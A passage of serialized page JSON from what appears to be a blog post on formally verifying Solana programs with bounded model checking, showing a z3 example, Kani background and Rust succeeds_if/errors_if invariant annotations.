",{"type":24,"tag":188,"props":26223,"children":26226},{"href":26224,"rel":26225},"https://github.com/Z3Prover/z3",[192],[26227],{"type":30,"value":26228},"z3",{"type":30,"value":26230}," SMT solver, we could check both of these cases like so:",{"type":24,"tag":291,"props":26232,"children":26234},{"code":26233,"language":9219,"meta":7,"className":9220,"style":7},"from z3 import *\n\nx = Int('x')\ny = Int('y')\nz = Int('z')\n\n# Positive branch:\ns = Solver()\ns.add(y == x + 3)\ns.add(y > 100)\ns.add(z == y * 2)\n\n# check if we can violate the correctness property\ns.add(Not(z != 105))\nprint(s.check()) # \"unsat\"\n\n# Negative branch:\ns = Solver()\ns.add(y == x + 3)\ns.add(y \u003C= 100)\ns.add(z == y + 1)\n\n# check if we can violate the correctness property\ns.add(Not(z != 105))\nprint(s.check()) # \"unsat\"\n",[26235],{"type":24,"tag":145,"props":26236,"children":26237},{"__ignoreMap":7},[26238,26261,26268,26294,26318,26342,26349,26357,26374,26402,26421,26449,26456,26464,26484,26502,26509,26517,26532,26559,26578,26605,26612,26619,26638],{"type":24,"tag":301,"props":26239,"children":26240},{"class":303,"line":304},[26241,26246,26251,26256],{"type":24,"tag":301,"props":26242,"children":26243},{"style":308},[26244],{"type":30,"value":26245},"from",{"type":24,"tag":301,"props":26247,"children":26248},{"style":359},[26249],{"type":30,"value":26250}," z3 ",{"type":24,"tag":301,"props":26252,"children":26253},{"style":308},[26254],{"type":30,"value":26255},"import",{"type":24,"tag":301,"props":26257,"children":26258},{"style":385},[26259],{"type":30,"value":26260}," *\n",{"type":24,"tag":301,"props":26262,"children":26263},{"class":303,"line":320},[26264],{"type":24,"tag":301,"props":26265,"children":26266},{"emptyLinePlaceholder":16},[26267],{"type":30,"value":341},{"type":24,"tag":301,"props":26269,"children":26270},{"class":303,"line":335},[26271,26276,26280,26285,26290],{"type":24,"tag":301,"props":26272,"children":26273},{"style":359},[26274],{"type":30,"value":26275},"x ",{"type":24,"tag":301,"props":26277,"children":26278},{"style":385},[26279],{"type":30,"value":523},{"type":24,"tag":301,"props":26281,"children":26282},{"style":359},[26283],{"type":30,"value":26284}," Int(",{"type":24,"tag":301,"props":26286,"children":26287},{"style":329},[26288],{"type":30,"value":26289},"'x'",{"type":24,"tag":301,"props":26291,"children":26292},{"style":359},[26293],{"type":30,"value":791},{"type":24,"tag":301,"props":26295,"children":26296},{"class":303,"line":344},[26297,26301,26305,26309,26314],{"type":24,"tag":301,"props":26298,"children":26299},{"style":359},[26300],{"type":30,"value":26084},{"type":24,"tag":301,"props":26302,"children":26303},{"style":385},[26304],{"type":30,"value":523},{"type":24,"tag":301,"props":26306,"children":26307},{"style":359},[26308],{"type":30,"value":26284},{"type":24,"tag":301,"props":26310,"children":26311},{"style":329},[26312],{"type":30,"value":26313},"'y'",{"type":24,"tag":301,"props":26315,"children":26316},{"style":359},[26317],{"type":30,"value":791},{"type":24,"tag":301,"props":26319,"children":26320},{"class":303,"line":401},[26321,26325,26329,26333,26338],{"type":24,"tag":301,"props":26322,"children":26323},{"style":359},[26324],{"type":30,"value":26124},{"type":24,"tag":301,"props":26326,"children":26327},{"style":385},[26328],{"type":30,"value":523},{"type":24,"tag":301,"props":26330,"children":26331},{"style":359},[26332],{"type":30,"value":26284},{"type":24,"tag":301,"props":26334,"children":26335},{"style":329},[26336],{"type":30,"value":26337},"'z'",{"type":24,"tag":301,"props":26339,"children":26340},{"style":359},[26341],{"type":30,"value":791},{"type":24,"tag":301,"props":26343,"children":26344},{"class":303,"line":415},[26345],{"type":24,"tag":301,"props":26346,"children":26347},{"emptyLinePlaceholder":16},[26348],{"type":30,"value":341},{"type":24,"tag":301,"props":26350,"children":26351},{"class":303,"line":439},[26352],{"type":24,"tag":301,"props":26353,"children":26354},{"style":1062},[26355],{"type":30,"value":26356},"# Positive branch:\n",{"type":24,"tag":301,"props":26358,"children":26359},{"class":303,"line":447},[26360,26365,26369],{"type":24,"tag":301,"props":26361,"children":26362},{"style":359},[26363],{"type":30,"value":26364},"s ",{"type":24,"tag":301,"props":26366,"children":26367},{"style":385},[26368],{"type":30,"value":523},{"type":24,"tag":301,"props":26370,"children":26371},{"style":359},[26372],{"type":30,"value":26373}," Solver()\n",{"type":24,"tag":301,"props":26375,"children":26376},{"class":303,"line":476},[26377,26382,26386,26390,26394,26398],{"type":24,"tag":301,"props":26378,"children":26379},{"style":359},[26380],{"type":30,"value":26381},"s.add(y ",{"type":24,"tag":301,"props":26383,"children":26384},{"style":385},[26385],{"type":30,"value":607},{"type":24,"tag":301,"props":26387,"children":26388},{"style":359},[26389],{"type":30,"value":25864},{"type":24,"tag":301,"props":26391,"children":26392},{"style":385},[26393],{"type":30,"value":11206},{"type":24,"tag":301,"props":26395,"children":26396},{"style":466},[26397],{"type":30,"value":25873},{"type":24,"tag":301,"props":26399,"children":26400},{"style":359},[26401],{"type":30,"value":791},{"type":24,"tag":301,"props":26403,"children":26404},{"class":303,"line":495},[26405,26409,26413,26417],{"type":24,"tag":301,"props":26406,"children":26407},{"style":359},[26408],{"type":30,"value":26381},{"type":24,"tag":301,"props":26410,"children":26411},{"style":385},[26412],{"type":30,"value":1456},{"type":24,"tag":301,"props":26414,"children":26415},{"style":466},[26416],{"type":30,"value":25910},{"type":24,"tag":301,"props":26418,"children":26419},{"style":359},[26420],{"type":30,"value":791},{"type":24,"tag":301,"props":26422,"children":26423},{"class":303,"line":504},[26424,26429,26433,26437,26441,26445],{"type":24,"tag":301,"props":26425,"children":26426},{"style":359},[26427],{"type":30,"value":26428},"s.add(z ",{"type":24,"tag":301,"props":26430,"children":26431},{"style":385},[26432],{"type":30,"value":607},{"type":24,"tag":301,"props":26434,"children":26435},{"style":359},[26436],{"type":30,"value":11339},{"type":24,"tag":301,"props":26438,"children":26439},{"style":385},[26440],{"type":30,"value":772},{"type":24,"tag":301,"props":26442,"children":26443},{"style":466},[26444],{"type":30,"value":469},{"type":24,"tag":301,"props":26446,"children":26447},{"style":359},[26448],{"type":30,"value":791},{"type":24,"tag":301,"props":26450,"children":26451},{"class":303,"line":512},[26452],{"type":24,"tag":301,"props":26453,"children":26454},{"emptyLinePlaceholder":16},[26455],{"type":30,"value":341},{"type":24,"tag":301,"props":26457,"children":26458},{"class":303,"line":592},[26459],{"type":24,"tag":301,"props":26460,"children":26461},{"style":1062},[26462],{"type":30,"value":26463},"# check if we can violate the correctness property\n",{"type":24,"tag":301,"props":26465,"children":26466},{"class":303,"line":619},[26467,26472,26476,26480],{"type":24,"tag":301,"props":26468,"children":26469},{"style":359},[26470],{"type":30,"value":26471},"s.add(Not(z ",{"type":24,"tag":301,"props":26473,"children":26474},{"style":385},[26475],{"type":30,"value":463},{"type":24,"tag":301,"props":26477,"children":26478},{"style":466},[26479],{"type":30,"value":26028},{"type":24,"tag":301,"props":26481,"children":26482},{"style":359},[26483],{"type":30,"value":9381},{"type":24,"tag":301,"props":26485,"children":26486},{"class":303,"line":635},[26487,26492,26497],{"type":24,"tag":301,"props":26488,"children":26489},{"style":314},[26490],{"type":30,"value":26491},"print",{"type":24,"tag":301,"props":26493,"children":26494},{"style":359},[26495],{"type":30,"value":26496},"(s.check()) ",{"type":24,"tag":301,"props":26498,"children":26499},{"style":1062},[26500],{"type":30,"value":26501},"# \"unsat\"\n",{"type":24,"tag":301,"props":26503,"children":26504},{"class":303,"line":643},[26505],{"type":24,"tag":301,"props":26506,"children":26507},{"emptyLinePlaceholder":16},[26508],{"type":30,"value":341},{"type":24,"tag":301,"props":26510,"children":26511},{"class":303,"line":652},[26512],{"type":24,"tag":301,"props":26513,"children":26514},{"style":1062},[26515],{"type":30,"value":26516},"# Negative branch:\n",{"type":24,"tag":301,"props":26518,"children":26519},{"class":303,"line":666},[26520,26524,26528],{"type":24,"tag":301,"props":26521,"children":26522},{"style":359},[26523],{"type":30,"value":26364},{"type":24,"tag":301,"props":26525,"children":26526},{"style":385},[26527],{"type":30,"value":523},{"type":24,"tag":301,"props":26529,"children":26530},{"style":359},[26531],{"type":30,"value":26373},{"type":24,"tag":301,"props":26533,"children":26534},{"class":303,"line":674},[26535,26539,26543,26547,26551,26555],{"type":24,"tag":301,"props":26536,"children":26537},{"style":359},[26538],{"type":30,"value":26381},{"type":24,"tag":301,"props":26540,"children":26541},{"style":385},[26542],{"type":30,"value":607},{"type":24,"tag":301,"props":26544,"children":26545},{"style":359},[26546],{"type":30,"value":25864},{"type":24,"tag":301,"props":26548,"children":26549},{"style":385},[26550],{"type":30,"value":11206},{"type":24,"tag":301,"props":26552,"children":26553},{"style":466},[26554],{"type":30,"value":25873},{"type":24,"tag":301,"props":26556,"children":26557},{"style":359},[26558],{"type":30,"value":791},{"type":24,"tag":301,"props":26560,"children":26561},{"class":303,"line":692},[26562,26566,26570,26574],{"type":24,"tag":301,"props":26563,"children":26564},{"style":359},[26565],{"type":30,"value":26381},{"type":24,"tag":301,"props":26567,"children":26568},{"style":385},[26569],{"type":30,"value":26188},{"type":24,"tag":301,"props":26571,"children":26572},{"style":466},[26573],{"type":30,"value":25910},{"type":24,"tag":301,"props":26575,"children":26576},{"style":359},[26577],{"type":30,"value":791},{"type":24,"tag":301,"props":26579,"children":26580},{"class":303,"line":3631},[26581,26585,26589,26593,26597,26601],{"type":24,"tag":301,"props":26582,"children":26583},{"style":359},[26584],{"type":30,"value":26428},{"type":24,"tag":301,"props":26586,"children":26587},{"style":385},[26588],{"type":30,"value":607},{"type":24,"tag":301,"props":26590,"children":26591},{"style":359},[26592],{"type":30,"value":11339},{"type":24,"tag":301,"props":26594,"children":26595},{"style":385},[26596],{"type":30,"value":11206},{"type":24,"tag":301,"props":26598,"children":26599},{"style":466},[26600],{"type":30,"value":487},{"type":24,"tag":301,"props":26602,"children":26603},{"style":359},[26604],{"type":30,"value":791},{"type":24,"tag":301,"props":26606,"children":26607},{"class":303,"line":3639},[26608],{"type":24,"tag":301,"props":26609,"children":26610},{"emptyLinePlaceholder":16},[26611],{"type":30,"value":341},{"type":24,"tag":301,"props":26613,"children":26614},{"class":303,"line":3647},[26615],{"type":24,"tag":301,"props":26616,"children":26617},{"style":1062},[26618],{"type":30,"value":26463},{"type":24,"tag":301,"props":26620,"children":26621},{"class":303,"line":3685},[26622,26626,26630,26634],{"type":24,"tag":301,"props":26623,"children":26624},{"style":359},[26625],{"type":30,"value":26471},{"type":24,"tag":301,"props":26627,"children":26628},{"style":385},[26629],{"type":30,"value":463},{"type":24,"tag":301,"props":26631,"children":26632},{"style":466},[26633],{"type":30,"value":26028},{"type":24,"tag":301,"props":26635,"children":26636},{"style":359},[26637],{"type":30,"value":9381},{"type":24,"tag":301,"props":26639,"children":26640},{"class":303,"line":3713},[26641,26645,26649],{"type":24,"tag":301,"props":26642,"children":26643},{"style":314},[26644],{"type":30,"value":26491},{"type":24,"tag":301,"props":26646,"children":26647},{"style":359},[26648],{"type":30,"value":26496},{"type":24,"tag":301,"props":26650,"children":26651},{"style":1062},[26652],{"type":30,"value":26501},{"type":24,"tag":32,"props":26654,"children":26655},{},[26656,26658,26664,26666,26671],{"type":30,"value":26657},"Both of these cases return ",{"type":24,"tag":145,"props":26659,"children":26661},{"className":26660},[],[26662],{"type":30,"value":26663},"unsat",{"type":30,"value":26665}," meaning z3 could not find a way to violate the correctness property, hence our program is ",{"type":24,"tag":5422,"props":26667,"children":26668},{},[26669],{"type":30,"value":26670},"correct",{"type":30,"value":26672}," according to this property.",{"type":24,"tag":80,"props":26674,"children":26676},{"id":26675},"loop-bounds-path-explosion",[26677],{"type":30,"value":26678},"Loop bounds & path explosion",{"type":24,"tag":32,"props":26680,"children":26681},{},[26682,26684,26689,26691,26696],{"type":30,"value":26683},"As you may have noticed, BMC requires us to take ",{"type":24,"tag":5422,"props":26685,"children":26686},{},[26687],{"type":30,"value":26688},"every",{"type":30,"value":26690}," branch in the program. To be sure that our property holds, we need to check every possible route through the program. If we have 10 branches in a row we might need to test 2^10 paths! And if our program has loops, we may need to check an ",{"type":24,"tag":5422,"props":26692,"children":26693},{},[26694],{"type":30,"value":26695},"infinite",{"type":30,"value":26697}," number of paths because the loop branches backward. This might take a while...",{"type":24,"tag":32,"props":26699,"children":26700},{},[26701],{"type":30,"value":26702},"This is where the \"bounded\" part of \"bounded model checking\" applies. Rather than unroll an infinite number of loops, we can set a loop bound and also verify that it is not possible to loop more than the loop bound.",{"type":24,"tag":32,"props":26704,"children":26705},{},[26706],{"type":30,"value":26707},"While this technique of bounding loops makes the problem tractable. It is still expensive to run BMC on very large programs due to the problem of path explosion. As our program gets larger, the number of possible paths scales potentially exponentially.",{"type":24,"tag":32,"props":26709,"children":26710},{},[26711],{"type":30,"value":26712},"One of the main challenges we will discuss later is how to address this problem of path explosion in the context of Solana Rust programs.",{"type":24,"tag":80,"props":26714,"children":26716},{"id":26715},"kani-model-checker",[26717],{"type":30,"value":26718},"Kani Model Checker",{"type":24,"tag":32,"props":26720,"children":26721},{},[26722,26724,26729],{"type":30,"value":26723},"For our research with formally verifying Solana programs, we are using the ",{"type":24,"tag":188,"props":26725,"children":26727},{"href":25624,"rel":26726},[192],[26728],{"type":30,"value":25628},{"type":30,"value":26730},": an open-source, bit-precise model checker for Rust created at AWS. Under the hood, Kani uses the C Bounded Model Checker (CBMC) to do the heavy lifting.",{"type":24,"tag":32,"props":26732,"children":26733},{},[26734,26736,26741,26743,26749,26750,26756,26758,26764],{"type":30,"value":26735},"Kani allows you to write ",{"type":24,"tag":5422,"props":26737,"children":26738},{},[26739],{"type":30,"value":26740},"proof harnesses",{"type":30,"value":26742}," which can invoke Rust functions with symbolic values. These harnesses can ",{"type":24,"tag":145,"props":26744,"children":26746},{"className":26745},[],[26747],{"type":30,"value":26748},"assume",{"type":30,"value":2378},{"type":24,"tag":145,"props":26751,"children":26753},{"className":26752},[],[26754],{"type":30,"value":26755},"assert",{"type":30,"value":26757}," certain conditions about these symbolic values and then you can verify that a proof harness holds via the ",{"type":24,"tag":145,"props":26759,"children":26761},{"className":26760},[],[26762],{"type":30,"value":26763},"cargo kani",{"type":30,"value":26765}," tool (which compiles your proof harness and runs BMC).",{"type":24,"tag":43,"props":26767,"children":26769},{"id":26768},"specification-how-can-we-describe-what-we-want-our-program-to-do",[26770,26772,26776],{"type":30,"value":26771},"Specification: How can we describe what we ",{"type":24,"tag":5422,"props":26773,"children":26774},{},[26775],{"type":30,"value":25697},{"type":30,"value":25699},{"type":24,"tag":32,"props":26778,"children":26779},{},[26780],{"type":24,"tag":5422,"props":26781,"children":26782},{},[26783],{"type":24,"tag":60,"props":26784,"children":26785},{},[26786],{"type":30,"value":26787},"And what even do we want it to do?",{"type":24,"tag":32,"props":26789,"children":26790},{},[26791,26793,26798],{"type":30,"value":26792},"A fundamental challenge with any formal verification framework is ",{"type":24,"tag":5422,"props":26794,"children":26795},{},[26796],{"type":30,"value":26797},"specifying",{"type":30,"value":26799}," what the \"correct\" behavior should be.",{"type":24,"tag":32,"props":26801,"children":26802},{},[26803],{"type":30,"value":26804},"In natural language, we can describe a few good properties for example Solana programs:",{"type":24,"tag":2655,"props":26806,"children":26807},{},[26808,26820,26831],{"type":24,"tag":2659,"props":26809,"children":26810},{},[26811,26813,26818],{"type":30,"value":26812},"\"It should not be possible to ",{"type":24,"tag":60,"props":26814,"children":26815},{},[26816],{"type":30,"value":26817},"steal money",{"type":30,"value":26819}," via a swap program\"",{"type":24,"tag":2659,"props":26821,"children":26822},{},[26823,26825,26830],{"type":30,"value":26824},"\"A multisig should never get into a state where you ",{"type":24,"tag":60,"props":26826,"children":26827},{},[26828],{"type":30,"value":26829},"can't sign anything",{"type":30,"value":9408},{"type":24,"tag":2659,"props":26832,"children":26833},{},[26834],{"type":30,"value":26835},"\"User funds in a staking protocol \"",{"type":24,"tag":32,"props":26837,"children":26838},{},[26839,26841,26851,26853,26858],{"type":30,"value":26840},"These are types of properties you can tell your ",{"type":24,"tag":188,"props":26842,"children":26845},{"href":26843,"rel":26844},"https://osec.io/",[192],[26846],{"type":24,"tag":5422,"props":26847,"children":26848},{},[26849],{"type":30,"value":26850},"human auditors",{"type":30,"value":26852}," but these English phrases are not particularly useful for ",{"type":24,"tag":5422,"props":26854,"children":26855},{},[26856],{"type":30,"value":26857},"automated verification techniques",{"type":30,"value":26859}," (at least until our AI overlords surpass human intelligence).",{"type":24,"tag":32,"props":26861,"children":26862},{},[26863,26865,26870,26872,26877],{"type":30,"value":26864},"Instead, we need to be able to specify ",{"type":24,"tag":5422,"props":26866,"children":26867},{},[26868],{"type":30,"value":26869},"in code",{"type":30,"value":26871}," what properties we want to check. Ideally, we could define invariants that fit nicely into something like an ",{"type":24,"tag":145,"props":26873,"children":26875},{"className":26874},[],[26876],{"type":30,"value":26755},{"type":30,"value":26878}," statement.",{"type":24,"tag":80,"props":26880,"children":26882},{"id":26881},"solana-invariants",[26883],{"type":30,"value":26884},"Solana Invariants",{"type":24,"tag":32,"props":26886,"children":26887},{},[26888,26890,26895,26896,26901],{"type":30,"value":26889},"In the context of Solana programs we define two different types of properties that we would like to verify: ",{"type":24,"tag":60,"props":26891,"children":26892},{},[26893],{"type":30,"value":26894},"instruction invariants",{"type":30,"value":2378},{"type":24,"tag":60,"props":26897,"children":26898},{},[26899],{"type":30,"value":26900},"account invariants",{"type":30,"value":206},{"type":24,"tag":270,"props":26903,"children":26905},{"id":26904},"instruction-invariant",[26906],{"type":30,"value":26907},"Instruction Invariant",{"type":24,"tag":32,"props":26909,"children":26910},{},[26911,26913,26918,26920,26926,26927,26933],{"type":30,"value":26912},"An ",{"type":24,"tag":60,"props":26914,"children":26915},{},[26916],{"type":30,"value":26917},"instruction invariant",{"type":30,"value":26919}," specifies sufficient conditions for an instruction to succeed (or fail). These are specified as ",{"type":24,"tag":145,"props":26921,"children":26923},{"className":26922},[],[26924],{"type":30,"value":26925},"succeeds_if",{"type":30,"value":152},{"type":24,"tag":145,"props":26928,"children":26930},{"className":26929},[],[26931],{"type":30,"value":26932},"errors_if",{"type":30,"value":26934}," macro annotations on the instruction handler.",{"type":24,"tag":32,"props":26936,"children":26937},{},[26938],{"type":30,"value":26939},"In Solana, when an instruction fails, the entire transaction is reverted. Failing an instruction on purpose is commonly used as a form of access control; invalid accounts, bad state, etc... will cause an instruction to fail and get reverted.",{"type":24,"tag":32,"props":26941,"children":26942},{},[26943,26945,26951,26953,26958],{"type":30,"value":26944},"For example, say we have a ",{"type":24,"tag":145,"props":26946,"children":26948},{"className":26947},[],[26949],{"type":30,"value":26950},"Withdraw",{"type":30,"value":26952}," instruction that lets a user withdraw some tokens. A security critical property we may want to verify is that the user cannot withdraw ",{"type":24,"tag":5422,"props":26954,"children":26955},{},[26956],{"type":30,"value":26957},"more",{"type":30,"value":26959}," tokens than their current balance.",{"type":24,"tag":32,"props":26961,"children":26962},{},[26963,26965,26970],{"type":30,"value":26964},"Using our tool, you could specify the following ",{"type":24,"tag":145,"props":26966,"children":26968},{"className":26967},[],[26969],{"type":30,"value":26932},{"type":30,"value":26971}," property on your instruction handler:",{"type":24,"tag":291,"props":26973,"children":26975},{"code":26974,"language":9817,"meta":7,"className":9818,"style":7},"#[errors_if(\n ctx.user.balance \u003C amount\n)]\nfn withdraw(ctx: Context\u003CWithdraw>, amount: u64) -> Result\u003C()> {\n ...\n}\n",[26976],{"type":24,"tag":145,"props":26977,"children":26978},{"__ignoreMap":7},[26979,26987,27022,27030,27103,27111],{"type":24,"tag":301,"props":26980,"children":26981},{"class":303,"line":304},[26982],{"type":24,"tag":301,"props":26983,"children":26984},{"style":359},[26985],{"type":30,"value":26986},"#[errors_if(\n",{"type":24,"tag":301,"props":26988,"children":26989},{"class":303,"line":320},[26990,26995,26999,27004,27008,27013,27017],{"type":24,"tag":301,"props":26991,"children":26992},{"style":359},[26993],{"type":30,"value":26994}," ctx",{"type":24,"tag":301,"props":26996,"children":26997},{"style":385},[26998],{"type":30,"value":206},{"type":24,"tag":301,"props":27000,"children":27001},{"style":359},[27002],{"type":30,"value":27003},"user",{"type":24,"tag":301,"props":27005,"children":27006},{"style":385},[27007],{"type":30,"value":206},{"type":24,"tag":301,"props":27009,"children":27010},{"style":359},[27011],{"type":30,"value":27012},"balance ",{"type":24,"tag":301,"props":27014,"children":27015},{"style":385},[27016],{"type":30,"value":1849},{"type":24,"tag":301,"props":27018,"children":27019},{"style":359},[27020],{"type":30,"value":27021}," amount\n",{"type":24,"tag":301,"props":27023,"children":27024},{"class":303,"line":335},[27025],{"type":24,"tag":301,"props":27026,"children":27027},{"style":359},[27028],{"type":30,"value":27029},")]\n",{"type":24,"tag":301,"props":27031,"children":27032},{"class":303,"line":344},[27033,27038,27043,27047,27052,27056,27061,27065,27069,27073,27078,27082,27086,27090,27094,27098],{"type":24,"tag":301,"props":27034,"children":27035},{"style":348},[27036],{"type":30,"value":27037},"fn",{"type":24,"tag":301,"props":27039,"children":27040},{"style":314},[27041],{"type":30,"value":27042}," withdraw",{"type":24,"tag":301,"props":27044,"children":27045},{"style":359},[27046],{"type":30,"value":362},{"type":24,"tag":301,"props":27048,"children":27049},{"style":369},[27050],{"type":30,"value":27051},"ctx",{"type":24,"tag":301,"props":27053,"children":27054},{"style":385},[27055],{"type":30,"value":1679},{"type":24,"tag":301,"props":27057,"children":27058},{"style":10246},[27059],{"type":30,"value":27060}," Context",{"type":24,"tag":301,"props":27062,"children":27063},{"style":359},[27064],{"type":30,"value":1849},{"type":24,"tag":301,"props":27066,"children":27067},{"style":10246},[27068],{"type":30,"value":26950},{"type":24,"tag":301,"props":27070,"children":27071},{"style":359},[27072],{"type":30,"value":13449},{"type":24,"tag":301,"props":27074,"children":27075},{"style":369},[27076],{"type":30,"value":27077},"amount",{"type":24,"tag":301,"props":27079,"children":27080},{"style":385},[27081],{"type":30,"value":1679},{"type":24,"tag":301,"props":27083,"children":27084},{"style":10246},[27085],{"type":30,"value":12680},{"type":24,"tag":301,"props":27087,"children":27088},{"style":359},[27089],{"type":30,"value":911},{"type":24,"tag":301,"props":27091,"children":27092},{"style":385},[27093],{"type":30,"value":882},{"type":24,"tag":301,"props":27095,"children":27096},{"style":10246},[27097],{"type":30,"value":20555},{"type":24,"tag":301,"props":27099,"children":27100},{"style":359},[27101],{"type":30,"value":27102},"\u003C()> {\n",{"type":24,"tag":301,"props":27104,"children":27105},{"class":303,"line":401},[27106],{"type":24,"tag":301,"props":27107,"children":27108},{"style":385},[27109],{"type":30,"value":27110}," ...\n",{"type":24,"tag":301,"props":27112,"children":27113},{"class":303,"line":415},[27114],{"type":24,"tag":301,"props":27115,"children":27116},{"style":359},[27117],{"type":30,"value":698},{"type":24,"tag":9770,"props":27119,"children":27120},{},[27121],{"type":24,"tag":32,"props":27122,"children":27123},{},[27124,27125,27130,27132,27137,27139,27144],{"type":30,"value":8079},{"type":24,"tag":145,"props":27126,"children":27128},{"className":27127},[],[27129],{"type":30,"value":26932},{"type":30,"value":27131}," expression specifies ",{"type":24,"tag":5422,"props":27133,"children":27134},{},[27135],{"type":30,"value":27136},"succifient",{"type":30,"value":27138}," but not ",{"type":24,"tag":5422,"props":27140,"children":27141},{},[27142],{"type":30,"value":27143},"necessary",{"type":30,"value":27145}," conditions for an instruction to fail. I.e. it imposes a strong lower bound on what the requirements are for an instruction to fail.",{"type":24,"tag":2719,"props":27147,"children":27148},{},[],{"type":24,"tag":32,"props":27150,"children":27151},{},[27152,27154,27159],{"type":30,"value":27153},"Another example is that for ",{"type":24,"tag":5422,"props":27155,"children":27156},{},[27157],{"type":30,"value":27158},"crank",{"type":30,"value":27160}," functions — run by unauthenticated users to advance the state of the system, you may want to prove that they never fail. In that case, you could specify an invariant like the following:",{"type":24,"tag":291,"props":27162,"children":27164},{"code":27163,"language":9817,"meta":7,"className":9818,"style":7},"#[succeeds_if(true)]\nfn my_crank(ctx: Context\u003CCrank>) -> Result\u003C()> {\n ...\n}\n",[27165],{"type":24,"tag":145,"props":27166,"children":27167},{"__ignoreMap":7},[27168,27176,27230,27237],{"type":24,"tag":301,"props":27169,"children":27170},{"class":303,"line":304},[27171],{"type":24,"tag":301,"props":27172,"children":27173},{"style":359},[27174],{"type":30,"value":27175},"#[succeeds_if(true)]\n",{"type":24,"tag":301,"props":27177,"children":27178},{"class":303,"line":320},[27179,27183,27188,27192,27196,27200,27204,27208,27213,27218,27222,27226],{"type":24,"tag":301,"props":27180,"children":27181},{"style":348},[27182],{"type":30,"value":27037},{"type":24,"tag":301,"props":27184,"children":27185},{"style":314},[27186],{"type":30,"value":27187}," my_crank",{"type":24,"tag":301,"props":27189,"children":27190},{"style":359},[27191],{"type":30,"value":362},{"type":24,"tag":301,"props":27193,"children":27194},{"style":369},[27195],{"type":30,"value":27051},{"type":24,"tag":301,"props":27197,"children":27198},{"style":385},[27199],{"type":30,"value":1679},{"type":24,"tag":301,"props":27201,"children":27202},{"style":10246},[27203],{"type":30,"value":27060},{"type":24,"tag":301,"props":27205,"children":27206},{"style":359},[27207],{"type":30,"value":1849},{"type":24,"tag":301,"props":27209,"children":27210},{"style":10246},[27211],{"type":30,"value":27212},"Crank",{"type":24,"tag":301,"props":27214,"children":27215},{"style":359},[27216],{"type":30,"value":27217},">) ",{"type":24,"tag":301,"props":27219,"children":27220},{"style":385},[27221],{"type":30,"value":882},{"type":24,"tag":301,"props":27223,"children":27224},{"style":10246},[27225],{"type":30,"value":20555},{"type":24,"tag":301,"props":27227,"children":27228},{"style":359},[27229],{"type":30,"value":27102},{"type":24,"tag":301,"props":27231,"children":27232},{"class":303,"line":335},[27233],{"type":24,"tag":301,"props":27234,"children":27235},{"style":385},[27236],{"type":30,"value":27110},{"type":24,"tag":301,"props":27238,"children":27239},{"class":303,"line":344},[27240],{"type":24,"tag":301,"props":27241,"children":27242},{"style":359},[27243],{"type":30,"value":698},{"type":24,"tag":32,"props":27245,"children":27246},{},[27247,27249,27253,27255,27261],{"type":30,"value":27248},"With this invariant, you could prove that the function ",{"type":24,"tag":5422,"props":27250,"children":27251},{},[27252],{"type":30,"value":19889},{"type":30,"value":27254}," returns ",{"type":24,"tag":145,"props":27256,"children":27258},{"className":27257},[],[27259],{"type":30,"value":27260},"Ok",{"type":30,"value":27262},". This type of construction could help avoid possible denial of service attacks if a crank could get \"stuck.\"",{"type":24,"tag":2719,"props":27264,"children":27265},{},[],{"type":24,"tag":32,"props":27267,"children":27268},{},[27269,27271,27276,27277,27282,27284,27289,27291,27296,27298,27303],{"type":30,"value":27270},"Note that ",{"type":24,"tag":145,"props":27272,"children":27274},{"className":27273},[],[27275],{"type":30,"value":26925},{"type":30,"value":2378},{"type":24,"tag":145,"props":27278,"children":27280},{"className":27279},[],[27281],{"type":30,"value":26932},{"type":30,"value":27283}," are both implications and not biconditionals. That is, a function may succeed even if ",{"type":24,"tag":145,"props":27285,"children":27287},{"className":27286},[],[27288],{"type":30,"value":26925},{"type":30,"value":27290}," is not satisfied and a function may fail even if ",{"type":24,"tag":145,"props":27292,"children":27294},{"className":27293},[],[27295],{"type":30,"value":26932},{"type":30,"value":27297}," is not satisfied. If you want to prove the ",{"type":24,"tag":5422,"props":27299,"children":27300},{},[27301],{"type":30,"value":27302},"exact condition",{"type":30,"value":27304}," required for an instruction to succeed, you could use a form like the following:",{"type":24,"tag":291,"props":27306,"children":27308},{"code":27307,"language":9817,"meta":7,"className":9818,"style":7},"fn my_invariant(...) -> bool { ... }\n\n#[succeeds_if(my_invariant(...))]\n#[errors_if(!my_invariant(...))]\nfn my_instruction(ctx: Context\u003C...>) -> Result\u003C()> {\n ...\n}\n",[27309],{"type":24,"tag":145,"props":27310,"children":27311},{"__ignoreMap":7},[27312,27356,27363,27380,27405,27457,27464],{"type":24,"tag":301,"props":27313,"children":27314},{"class":303,"line":304},[27315,27319,27324,27328,27332,27336,27340,27344,27348,27352],{"type":24,"tag":301,"props":27316,"children":27317},{"style":348},[27318],{"type":30,"value":27037},{"type":24,"tag":301,"props":27320,"children":27321},{"style":314},[27322],{"type":30,"value":27323}," my_invariant",{"type":24,"tag":301,"props":27325,"children":27326},{"style":359},[27327],{"type":30,"value":362},{"type":24,"tag":301,"props":27329,"children":27330},{"style":385},[27331],{"type":30,"value":4054},{"type":24,"tag":301,"props":27333,"children":27334},{"style":359},[27335],{"type":30,"value":911},{"type":24,"tag":301,"props":27337,"children":27338},{"style":385},[27339],{"type":30,"value":882},{"type":24,"tag":301,"props":27341,"children":27342},{"style":10246},[27343],{"type":30,"value":18848},{"type":24,"tag":301,"props":27345,"children":27346},{"style":359},[27347],{"type":30,"value":16392},{"type":24,"tag":301,"props":27349,"children":27350},{"style":385},[27351],{"type":30,"value":4054},{"type":24,"tag":301,"props":27353,"children":27354},{"style":359},[27355],{"type":30,"value":16401},{"type":24,"tag":301,"props":27357,"children":27358},{"class":303,"line":320},[27359],{"type":24,"tag":301,"props":27360,"children":27361},{"emptyLinePlaceholder":16},[27362],{"type":30,"value":341},{"type":24,"tag":301,"props":27364,"children":27365},{"class":303,"line":335},[27366,27371,27375],{"type":24,"tag":301,"props":27367,"children":27368},{"style":359},[27369],{"type":30,"value":27370},"#[succeeds_if(my_invariant(",{"type":24,"tag":301,"props":27372,"children":27373},{"style":385},[27374],{"type":30,"value":4054},{"type":24,"tag":301,"props":27376,"children":27377},{"style":359},[27378],{"type":30,"value":27379},"))]\n",{"type":24,"tag":301,"props":27381,"children":27382},{"class":303,"line":344},[27383,27388,27392,27397,27401],{"type":24,"tag":301,"props":27384,"children":27385},{"style":359},[27386],{"type":30,"value":27387},"#[errors_if(",{"type":24,"tag":301,"props":27389,"children":27390},{"style":385},[27391],{"type":30,"value":2485},{"type":24,"tag":301,"props":27393,"children":27394},{"style":359},[27395],{"type":30,"value":27396},"my_invariant(",{"type":24,"tag":301,"props":27398,"children":27399},{"style":385},[274